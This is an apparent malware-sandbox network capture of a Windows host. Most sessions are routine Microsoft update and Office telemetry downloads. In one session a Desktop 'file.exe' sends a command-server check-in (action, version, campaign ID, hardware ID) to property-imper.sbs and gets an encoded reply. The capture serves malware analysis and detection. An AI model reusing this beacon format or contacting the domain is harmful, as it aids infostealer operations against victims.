                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                        2024-11-24 01:13:19 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                        MS-CorrelationId: b1562fae-35c4-43fe-81b3-37acbf84fcdf
                                                                                                                                                                                        MS-RequestId: 7a21759f-29ea-49cd-9891-4c0883e83dbc
                                                                                                                                                                                        MS-CV: lDBl5m2wcUC2P4FW.0
                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:18 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                        2024-11-24 01:13:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                        2024-11-24 01:13:19 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        8192.168.2.54971413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:20 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:21 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:20 GMT
                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                        Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                                                                                                                                                                                        ETag: "0x8DD0BB889D4282C"
                                                                                                                                                                                        x-ms-request-id: c3062018-b01e-003e-79df-3d8e41000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011320Z-178bfbc474bvjk8shC1NYC83ns000000051000000000fx14
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:21 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                                        Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                                        Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                                        Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                                        Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                                        Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                                                                                                                                                        Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                                                                                                                                                        2024-11-24 01:13:21 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                                                                                                                                                        Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        9192.168.2.54972213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:23 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:23 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                        x-ms-request-id: 2bdd5943-e01e-0052-493a-3dd9df000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011323Z-178bfbc474bxkclvhC1NYC69g400000005a0000000000a5a
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:23 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        10192.168.2.549723104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:23 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:23 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 36 30 34 42 42 41 38 41 31 43 33 38 38 32 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=604BBA8A1C3882ACD7CBBD6DF28D3732
                                                                                                                                                                                        2024-11-24 01:13:24 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:24 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=qtpmq8k105bl2jdvdedptuarkm; expires=Wed, 19-Mar-2025 19:00:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5921fZV%2B6VZ%2Bl8e7rbmIvzjBpC2sP16H14cLToBM76q9QUXl5CcTgK5ubrsjDWB2CdeSA7PpiXF5B7hRCDk24%2FwDB4qj4%2F7X962AvsT5%2Bo%2FLsPq3y0WOqWtobFTPOdCpNlg%2Blkw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e7589439bda41a6-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1077888&cwnd=238&unsent_bytes=0&cid=96e5b5fa308f59ba&ts=714&x=0"
                                                                                                                                                                                        2024-11-24 01:13:24 UTC214INData Raw: 64 30 0d 0a 65 63 71 6b 51 67 64 49 46 61 69 46 42 36 59 38 44 53 6b 65 47 31 56 36 47 62 4b 42 47 69 53 4c 73 39 7a 49 56 39 6c 52 6b 32 73 69 73 59 59 33 4a 58 49 33 77 50 46 7a 31 67 5a 52 42 6b 49 30 5a 45 49 73 6e 4c 4d 72 45 61 57 43 37 66 74 35 36 47 66 50 52 42 61 73 77 68 34 6f 4c 48 44 4f 71 32 4c 65 57 53 38 46 50 48 30 68 57 43 4f 43 72 54 68 42 71 59 6e 74 74 58 75 69 63 2b 5a 4a 51 2b 6a 4d 4e 6e 4d 34 4c 2f 53 71 57 34 6b 4e 4e 52 77 77 4b 57 52 50 4e 34 4f 77 4b 51 71 36 68 59 44 6e 4a 4b 30 30 38 67 59 6c 35 64 59 6a 61 53 78 36 78 61 74 69 33 6c 6b 76 42 54 78 39 49 56 67 6a 67 71 30 34 51 61 6d 4a 37 4c 55 4b 0d 0a
                                                                                                                                                                                        Data Ascii: d0ecqkQgdIFaiFB6Y8DSkeG1V6GbKBGiSLs9zIV9lRk2sisYY3JXI3wPFz1gZRBkI0ZEIsnLMrEaWC7ft56GfPRBaswh4oLHDOq2LeWS8FPH0hWCOCrThBqYnttXuic+ZJQ+jMNnM4L/SqW4kNNRwwKWRPN4OwKQq6hYDnJK008gYl5dYjaSx6xati3lkvBTx9IVgjgq04QamJ7LUK
                                                                                                                                                                                        2024-11-24 01:13:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        11192.168.2.54971813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:23 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:23 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                        x-ms-request-id: f08fc492-601e-0002-7931-3da786000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
